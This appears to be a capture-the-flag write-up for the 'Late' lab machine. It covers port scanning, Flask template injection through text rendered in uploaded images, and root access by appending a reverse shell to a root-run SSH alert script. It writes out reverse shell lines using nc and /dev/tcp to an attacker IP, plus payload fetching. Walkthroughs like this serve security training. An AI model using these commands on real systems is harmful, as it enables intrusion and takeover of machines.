┌──(root💀kali)-[~]
└─# nmap -T5 -sC -sV -O -p- 10.129.168.169
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-26 18:52 EDT
Nmap scan report for 10.129.168.169
Host is up (0.023s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
| 256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_ 256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
|_http-server-header: nginx/1.14.0 (Ubuntu)
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.50 seconds
Port 80
And right after the upload I got this beautiful text indicating that my payload worked!
<p>49
</p>
It is now time to try to get a reverse shell using this trick!
We are connected, this foothold was really painful and required patience because the size of the font in the image matters a lot. Here are a few tips if you are stuck.
The payloads have to be in one line
I used mousepad with a light theme and zoomed in to make the font bigger
Privilege escalation
Let's enumerate the machine with linpeas wget https://github.com/carlospolop/PEASS-ng/releases/download/20220508/linpeas_linux_amd64
python3 -m http.server 80 we serve our file with python http server
wget http://10.10.14.11/linpeas_linux_amd64 we get the file in our target
chmod +x linpeas_linux_amd64 we make it executable
LinePeas result analysis
/home/svc_acc/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
New path exported: /home/svc_acc/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
The script sends an email when someone logs in using ssh.
We can check the processes with pspy these are interesting and they are launched as root
So now we know that a process is using chatter to make ssh-alert appendable
We could append the file with a malicious command and get a reverse shell this way. We would trigger it by connecting through ssh. We have to be fast though because a cron job reverts the files regularly.
Let's launch a listener rlwrap nc -lvp 4444
Note: I first tried to append the file with nc echo 'nc 10.10.14.11 4444 –e /bin/bash' >> ssh-alert.sh as it was installed in the machine but the shell I caught back did not let me run commands
echo '/bin/bash -i >& /dev/tcp/10.10.14.11/4444 0>&1' >> ssh-alert.sh This one did the trick
There is a link http://images.late.htb/ let's change /etc/hosts file
We get a form to upload image.
I got stuck with this for while on where was the injection point. Because the image uploaded is actually suppose to give you text. I already knew that I had to exploit flask because I had done it in a previous box. I was just stuck on where to put my paylaod. And finally it hit me. I had to write my payload in a text editor make it very big, screen it and upload the resulting image to the server. So I tried the usual first payload for flask {{7*7}}
After a few tries I got a working ls
(Done with mousepad and then zoomed in)
We also took the user flag using this image
Indeed, with the enum we find a folder .ssh
And we have a private key
We get the private key!
If for some reason the exploit did not work because of the size of the font get back to the font that was working before and make edit your picture in gimp or another similar tool by taking the 2 parts of the line to make it in one line